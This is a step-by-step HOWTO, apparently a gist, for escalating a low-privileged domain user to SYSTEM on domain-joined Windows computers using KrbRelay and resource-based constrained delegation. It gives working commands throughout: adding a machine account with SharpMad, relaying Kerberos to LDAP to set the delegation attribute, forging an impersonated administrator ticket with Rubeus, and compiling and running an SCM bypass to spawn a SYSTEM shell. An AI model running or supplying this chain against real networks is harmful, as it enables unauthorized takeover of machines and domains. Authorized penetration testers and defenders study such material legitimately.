Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
- Ability for the current domain user to add computers to the domain (ms-DS-MachineAccountQuota = 10 by default!) or an owned computer account
Kerberos Relay Attack adds a fake (or owned) computer account to the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, making it possible to perform a Resource-Based Constrained Delegation Attack against the target. The result of the RBCD attack is Silver Ticket access to the target, which can be used for local admin access remotely or even locally (meaning privilege escalation) by patching the Win32 Service Control Manager to use Kerberos Authentication locally.
1.) Add a computer account with SharpMad (or use an owned one):
Sharpmad.exe MAQ -Action new -MachineAccount evilcomputer -MachinePassword pass.123
2.) Get the SID of that computer object with PowerShell:
$o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
Alternative way (without knowing the full DN):
$f = "(&(objectCategroy=computer)(objectClass=computer)(cn=evilcomputer))"
$s = ([ADSISearcher]$f).FindOne().Properties.objectSID
(New-Object System.Security.Principal.SecurityIdentifier([byte[]]($s | Out-String -Stream), 0)).Value
3.) Abuse the attribute msDS-AllowedToActOnBehalfOfOtherIdentity of the target (desktop12.ecorp.local) computer account
by launching the awesome Kerberos Relay attack using KrbRelay.
First get a suitable port for COM:
CheckPort.exe
Then use the returned port value and the SID value from Step 2 for the attack:
KrbRelay.exe -spn ldap/dc1.ecorp.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3239103757-393380102-551265849-2110 -port 10
For this working, LDAP signing on DC1 should not be required (default setting).
Now the computer object desktop12 should be allowed to act on behalf of the created/owned evilcomputer account.
This was the key step for this attack. The following is generic RBCD Abuse.
4.) Use the S4U Action of Rubeus for getting Kerberos tickets with SPNs and impersonated to local admin access.
First calculate the NTLM hash of the owned computer account password:
Rubeus.exe hash /password:pass.123
And get a Kerberos ticket with the HOST/DESKTOP12 SPN (using for SCM access later) and inject into the current session:
Rubeus.exe s4u /user:evilcomputer$ /rc4:DBA335196E8CE3DEDB7140452ADEE42D /impersonateuser:administrator /msdsspn:host/desktop12 /ptt
Note that computername without FQDN part should be used for the SPN (to make it match for the tool used in the next step).
5.) Patch the Win32 API in Service Control Manager for using Kerberos tickets in local authentication and
privesc to NT AUTHORITY\System by creating a service (launching cmd.exe). Here it is from Tyranid:
https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82
Compile it (using cmdline Visual Studio):
cl -DUNICODE SCMUACBypass.cpp advapi32.lib
And launch it (in the session where the HOST/Desktop12 ticket is available, check it with klist):
SCMUACBypass.exe
You should have a System shell in the end. :)
+1.) Cleanup: remove the service created by the previous step (what launched cmd.exe), in the system shell:
sc delete UacBypassedService